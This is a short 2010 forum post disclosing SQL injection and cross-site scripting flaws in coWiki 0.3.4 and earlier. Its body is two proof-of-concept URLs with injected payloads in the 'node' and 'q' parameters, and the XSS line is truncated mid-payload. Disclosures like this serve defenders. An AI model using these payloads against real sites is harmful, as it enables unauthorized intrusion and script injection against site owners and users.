Professional Webmasters Community
Would you like to react to this message? Create an account in a few clicks or log in to continue.

SQL Injection and XSS vulnerability in coWiki

Go down

SQL Injection and XSS vulnerability in coWiki  Empty SQL Injection and XSS vulnerability in coWiki

Post  andry Wed Aug 11, 2010 11:50 pm

SQL Injection:

http://site/index.php?node=-1 '% 20or% 20version ()% 3E'5

Vulnerable coWiki 0.3.4 and previous versions.


XSS:

Vulnerability in the main script in the parameter q.

http://site/?cmd=srchdoc&q =% 22% 3E% 3Cscript% 3Ealert (document
andry
andry
Moderator
Moderator

Posts : 467
Join date : 2010-05-07

Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum